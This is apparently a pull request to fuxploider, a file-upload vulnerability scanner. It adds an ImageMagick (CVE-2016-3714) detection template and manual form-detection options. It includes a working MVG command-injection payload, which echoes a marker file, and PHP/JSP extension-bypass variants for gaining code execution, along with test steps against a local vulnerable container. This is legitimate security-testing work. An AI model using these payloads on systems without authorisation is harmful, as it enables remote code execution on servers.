### PR TITLE
Added ImageMagick template

### DIFF
--- a/README.md
+++ b/README.md
@@ -20,11 +20,11 @@ Usage
 
 To get a list of basic options and switches use :
 
-    python fuxploider.py -h
+    python3 fuxploider.py -h
 
 Basic example :
 
-    python fuxploider.py --url https://awesomeFileUploadService.com --not-regex "wrong file type"
+    python3 fuxploider.py --url https://awesomeFileUploadService.com --not-regex "wrong file type"
 
 
 > [!] legal disclaimer : Usage of fuxploider for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

--- a/UploadForm.py
+++ b/UploadForm.py
@@ -4,19 +4,22 @@ from urllib.parse import urljoin,urlparse
 from threading import Lock
 
 class UploadForm :
-	def __init__(self,notRegex,trueRegex,session,size,postData,uploadsFolder=None) :
+	def __init__(self,notRegex,trueRegex,session,size,postData,uploadsFolder=None,formUrl=None,formAction=None,inputName=None) :
 		self.logger = logging.getLogger("fuxploider")
 		self.postData = postData
-		#self.uploadUrl = uploadUrl
-		#self.formUrl = formUrl
+		self.formUrl = formUrl
+		url = urlparse(self.formUrl)
+		self.schema = url.scheme
+		self.host = url.netloc
+		self.uploadUrl = urljoin(formUrl, formAction)
 		self.session = session
 		self.trueRegex = trueRegex
 		self.notRegex = notRegex
-		#self.inputName = inputName
+		self.inputName = inputName
 		self.uploadsFolder = uploadsFolder
 		self.size = size
 		self.validExtensions = []
-		#self.httpRequests = 0
+		self.httpRequests = 0
 		self.codeExecUrlPattern = None #pattern for code exec detection using true regex findings
 		self.logLock = Lock()
 		self.stopThreads = False

--- a/UploadForm.py
+++ b/UploadForm.py
@@ -71,16 +71,16 @@ class UploadForm :
 		self.logger.debug("Using following URL for file upload : %s",self.uploadUrl)
 
 		if not self.uploadsFolder and not self.trueRegex :
-			self.logger.warning("No uploads folder nor true regex defined, code execution detection will not be possible.")
+			self.logger.warning("No uploads folder nor true regex defined, code execution detection will not be possible. (Except for templates with a custom codeExecURL)")
 		elif not self.uploadsFolder and self.trueRegex :
-			print("No uploads path provided, code detection can still be done using true regex capturing group.")
+			print("No uploads path provided, code detection can still be done using true regex capturing group. (Except for templates with a custom codeExecURL)")
 			cont = input("Do you want to use the True Regex for code execution detection ? [Y/n] ")
 			if cont.lower().startswith("y") or cont == "" :
 				preffixPattern = input("Preffix capturing group of the true regex with : ")
 				suffixPattern = input("Suffix capturing group of the true regex with : ")
 				self.codeExecUrlPattern = preffixPattern+"$captGroup$"+suffixPattern
 			else :
-				self.logger.warning("Code execution detection will not be possible as there is no path nor regex pattern configured.")
+				self.logger.warning("Code execution detection will not be possible as there is no path nor regex pattern configured. (Except for templates with a custom codeExecURL)")
 		else :
 			pass#uploads folder provided
 
@@ -214,10 +214,10 @@ class UploadForm :
 				if self.shouldLog :
 					self.logger.info("\033[1;32m\tTrue regex matched the following information : %s\033[m",uploadRes)
 
-			if codeExecRegex and valid_regex(codeExecRegex) and (self.uploadsFolder or self.trueRegex) :
+			if codeExecRegex and valid_regex(codeExecRegex) and (self.uploadsFolder or self.trueRegex or codeExecURL) :
 				url = None
 				secondUrl = None
-				if self.uploadsFolder :
+				if self.uploadsFolder or codeExecURL:
 					if codeExecURL:
 						filename_wo_ext = fu[2]
 						url = codeExecURL.replace("$uploadFormDir$",os.path.dirname(self.uploadUrl)).replace("$filename$",filename_wo_ext)

--- a/UploadForm.py
+++ b/UploadForm.py
@@ -231,10 +231,12 @@ class UploadForm :
 					executedCode = self.detectCodeExec(url,codeExecRegex)
 					if executedCode :
 						result["codeExec"] = True
+						result["url"] = url
 				if secondUrl :
 					executedCode = self.detectCodeExec(secondUrl,codeExecRegex)
 					if executedCode :
 						result["codeExec"] = True
+						result["url"] = secondUrl
 		return result
 
 	#detects html forms and returns a list of beautifulSoup objects (detected forms)

--- a/fuxploider.py
+++ b/fuxploider.py
@@ -293,7 +293,7 @@ with concurrent.futures.ThreadPoolExecutor(max_workers=args.nbThreads) as execut
 				if res["codeExec"] :
 
 					foundEntryPoint = future.a
-					logging.info("\033[1m\033[42mCode execution obtained ('%s','%s','%s')\033[m",foundEntryPoint["suffix"],foundEntryPoint["mime"],foundEntryPoint["templateName"])
+					logging.info("\033[1m\033[42mCode execution obtained ('%s','%s','%s','%s')\033[m",foundEntryPoint["suffix"],foundEntryPoint["mime"],foundEntryPoint["templateName"],res["url"])
 					nbOfEntryPointsFound += 1
 					entryPoints.append(foundEntryPoint)
 

--- a/fuxploider.py
+++ b/fuxploider.py
@@ -253,21 +253,6 @@ nbOfEntryPointsFound = 0
 attempts = []
 templatesData = {}
 
-'''for template in templates :
-	templatefd = open(templatesFolder+"/"+template["filename"],"rb")
-	templatesData[template["templateName"]] = templatefd.read()
-	templatefd.close()
-	nastyExt = template["nastyExt"]
-	nastyMime = getMime(extensions,nastyExt)
-	nastyExtVariants = template["extVariants"]
-	for legitExt in up.validExtensions :
-		legitMime = getMime(extensions,legitExt)
-		for nastyVariant in [nastyExt]+nastyExtVariants :
-			for t in techniques :
-				mime = legitMime if t["mime"] == "legit" else nastyMime
-				suffix = t["suffix"].replace("$legitExt$",legitExt).replace("$nastyExt$",nastyVariant)
-				attempts.append({"suffix":suffix,"mime":mime,"templateName":template["templateName"]})'''
-
 for template in templates :
 	templatefd = open(templatesFolder+"/"+template["filename"],"rb")
 	templatesData[template["templateName"]] = templatefd.read()

--- a/fuxploider.py
+++ b/fuxploider.py
@@ -53,6 +53,11 @@ exclusiveUserAgentsArgs = parser.add_mutually_exclusive_group()
 exclusiveUserAgentsArgs.add_argument("-U","--user-agent",metavar="useragent",nargs=1,dest="userAgent",help="User-agent to use while requesting the target.",type=str,default=[requests.utils.default_user_agent()])
 exclusiveUserAgentsArgs.add_argument("--random-user-agent",action="store_true",required=False,dest="randomUserAgent",help="Use a random user-agent while requesting the target.")
 
+manualFormArgs = parser.add_argument_group('Manual Form Detection arguments')
+manualFormArgs.add_argument("-m","--manual-form-detection",action="store_true",dest="manualFormDetection",help="Disable automatic form detection. Useful when automatic detection fails due to: (1) Form loaded using Javascript (2) Multiple file upload forms in URL.")
+manualFormArgs.add_argument("--input-name",metavar="image",dest="inputName",help="Name of input for file. Example: <input type=\"file\" name=\"image\">")
+manualFormArgs.add_argument("--form-action",default="",metavar="upload.php",dest="formAction",help="Path of form action. Example: <form method=\"POST\" action=\"upload.php\">")
+
 args = parser.parse_args()
 args.uploadsPath = args.uploadsPath[0]
 args.nbThreads = args.nbThreads[0]
@@ -111,6 +116,9 @@ if args.legitExtensions :
 
 if args.cookies :
 	args.cookies = postDataFromStringToJSON(args.cookies[0])
+
+if args.manualFormDetection and args.inputName is None:
+	parser.error("--manual-form-detection requires --input-name")
 
 print("""\033[1;32m
                                      
@@ -189,8 +197,13 @@ if args.proxy :
 	s.proxies.update(proxies)
 #########################################################
 
-up = UploadForm(args.notRegex,args.trueRegex,s,args.size,postData,args.uploadsPath)
-up.setup(args.url)
+if args.manualFormDetection:
+	if args.formAction == "":
+		logger.warning("Using Manual Form Detection and no action specified with --form-action. Defaulting to empty string - meaning form action will be set to --url parameter.")
+	up = UploadForm(args.notRegex,args.trueRegex,s,args.size,postData,args.uploadsPath,args.url,args.formAction,args.inputName)
+else:
+	up = UploadForm(args.notRegex,args.trueRegex,s,args.size,postData,args.uploadsPath)
+	up.setup(args.url)
 up.threads = args.nbThreads
 #########################################################
 

--- a/payloads/imagemagick_rce.mvg
+++ b/payloads/imagemagick_rce.mvg
@@ -1,0 +1,4 @@
+push graphic-context
+viewbox 0 0 640 480
+fill 'url(https://example.com/image.jpg"|echo ImageTragick Detected! > "$filename$.txt)'
+pop graphic-context

--- a/templates.json
+++ b/templates.json
@@ -22,11 +22,11 @@
 		"extVariants":["php1","php2","php3","php4","php5","phtml","pht","Php","PhP","pHp","pHp1","pHP2","pHtMl","PHp5"]
 	},
 	{
-		"templateName" : "jsptest",
+		"templateName" : "basicjsp",
 		"description" : "Basic jsp file with simple mathematical expression.",
 		"filename":"template.jsp",
 		"nastyExt":"jsp",
 		"codeExecRegex":"12",
-		"extVariants":[]
+		"extVariants":["JSP","jSp"]
 	}
 ]

--- a/templates.json
+++ b/templates.json
@@ -28,5 +28,13 @@
 		"nastyExt":"jsp",
 		"codeExecRegex":"12",
 		"extVariants":["JSP","jSp"]
+	},
+	{
+		"templateName" : "imagetragick",
+		"description" : "Attempts to exploit RCE in ImageMagick (CVE-2016–3714)",
+		"filename":"imagemagick_rce.mvg",
+		"codeExecRegex":"ImageTragick Detected!",
+		"codeExecURL":"$uploadFormDir$/$filename$.txt",
+		"dynamicPayload":"True"
 	}
 ]


### PR DESCRIPTION
Added template for detection of ImageMagick RCE vulnerability

Added a new template to "templates.json" which detects the ImageMagick RCE vulnerability (CVE-2016-3714). ImageMagick is a program used by many servers in order to convert images between formats or change their dimensions. If it is running a vulnerable version of the program, it may be vulnerable to Remote Code Execution. This should be properly detected by the newly added template. For more details on the vulnerability, see [ImageTragick](https://imagetragick.com/)

In order to implement the new template, added new features:
- "nastyext" not required in template - for templates such as "imagemagick", there is no requirement for nasty extensions, since the file uploaded is a standard image file. All legitimate extensions will be tested.
- Added "codeExecURL" parameter to templates: Used when the URL to check the code execution is not the URL of the uploaded image (such as in the imagemagick RCE vulnerability). When using this parameter, the "--uploads-path" is not required. Currently supports $uploadFormDir$ (directory of upload form action) & $filename$ (name of the uploaded file without the extension)
- Added "dynamicPayload" parameter to templates: Used when need to create a different payload for different files uploaded. For example, needed in "imagemagick" template, since the name of the created file is contained inside the payload. Currently supports $filename$ (name of the uploaded file without the extension)

In order to test the vulnerability, I used a docker machine running a vulnerable version of ImageMagick. Created a docker based on [VulApps](http://vulapps.evalbug.com/i_imagemagick_1/). In order to test against my custom docker machine, run the following commands:
`docker pull madhatter37/vulnerable_apps:imagemagick_1.0.10`
`docker run -d -p 80:80 madhatter37/vulnerable_apps:imagemagick_1.0.10`
`./fuxploider.py -u http://127.0.0.1/file_upload/poc.php --not-regex "your file was not uploaded" --true-regex "has been uploaded to" --data "submit=Submit" --template=imagetragick`
(Chose "n" for using True Regex for code execution detection)
